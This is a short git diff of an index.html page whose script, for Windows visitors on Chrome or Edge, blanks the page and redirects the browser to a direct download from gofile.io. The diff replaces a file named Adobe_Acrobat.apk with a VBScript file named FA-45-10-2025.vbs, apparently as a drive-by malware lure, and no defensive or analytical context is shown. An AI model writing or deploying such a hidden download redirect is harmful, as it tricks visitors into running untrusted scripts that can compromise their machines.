--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://cold5.gofile.io/download/direct/32c8a658-0979-494c-b37f-8251d3892502/Adobe_Acrobat.apk"; // keep placeholder
+        window.location.href = "https://store-eu-par-2.gofile.io/download/direct/da432a38-83bb-40bc-8f29-1062d10db950/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
